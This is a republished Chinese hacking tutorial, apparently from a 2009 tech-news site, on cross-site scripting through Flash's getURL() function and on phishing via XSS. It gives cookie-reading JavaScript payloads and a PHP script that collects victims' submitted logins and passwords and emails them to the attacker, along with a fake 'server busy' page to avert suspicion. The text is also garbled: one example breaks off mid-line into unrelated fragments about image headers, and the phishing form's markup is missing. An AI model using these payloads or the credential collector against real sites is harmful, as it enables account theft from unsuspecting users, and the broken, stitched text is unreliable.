科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网安全频道黑客攻防:如何利用Flash进行XSS攻击

黑客攻防:如何利用Flash进行XSS攻击

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

非常有趣的是Flash的getURL()动作,它可以使我们的页面重定向到函数指定的页面,改函数的语法如下:在2002年的时候,曾经公布这个函数的危险性,例如可以用下面的方式来获取浏览者的cookie:

来源:黑基网 2009年9月4日

关键字: 黑客

  • 评论
  • 分享微博
  • 分享邮件

  Flash是用于复杂的动画,仿真和游戏开发等。非常有趣的是Flash的getURL()动作,它可以使我们的页面重定向到函数指定的页面,改函数的语法如下:

  getURL(url:String, [window: String,[method:String]])

  例如:getURL(”http://victime.com/login.php?logout=true”,”_self“);

  该函数的各个参数为:

  url: 重定向的网站url

  window: 设置重定向的窗口打开方式 (_self, _blank…)

  method: 请求页面的方式 GET 或者 POST

  下面运用actionscrip来弹出警告窗口的方法:

  getURL(”javascript:alert(’XSS’”);

  在2002年的时候,曾经公布这个函数的危险性,例如可以用下面的方式来获取浏览者的cookie:

  getURL(”javascript:alert(document.cookie)”)

  在2005年12月的时候,对getURL()进行了改进,改进了在flash文件签名中输入XSS语句从而导致永久性XSS攻击的漏洞。官方采用这种更新是为了防止再次爆发MySpace中传播Samy Xss蠕虫,Samy可以隐藏在flash中******cookies。

  但是这样的更新就解决了XSS吗?不,目前还没有完全解决flash的XSS问题,下面的例子来说明,在flash文件中输入:

  GetURL(”http://www.victime.com/page.php?var=GIF89aGIF = GIF89a

  JPG = à JFIF

  BMP = BMF

  为了安全不能仅仅依靠getimagesize()函数来检查图片。

  第八章、利用XSS漏洞进行钓鱼

  你了解钓鱼(phishing)的目的吗?你了解XSS的目的吗?

  在我们的例子中,将有必要找一个存在XSS漏洞的网站,并在一个form表单里注入一个URL重定向的代码:

  Enter your login and password, thank:

  Login:

  Password:

  你已经猜到这个脚本将冒充一个form表单来发送用户名及密码给代你,下面的php文件是用来发送email的(mail.php):

  $login = $HTTP_GET_VARS["login"];

  $password = $HTTP_GET_VARS["password"];

  mail(”email@example.com“, “Cookie stealed ! - thx xyli :)”, $password , $login );

  >

  Error-Server too much busy

  用户提交后看到这个页面会认为网页等待与超载是正常的,而不会有所怀疑什么,我相信你已经明白这个道理了?

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章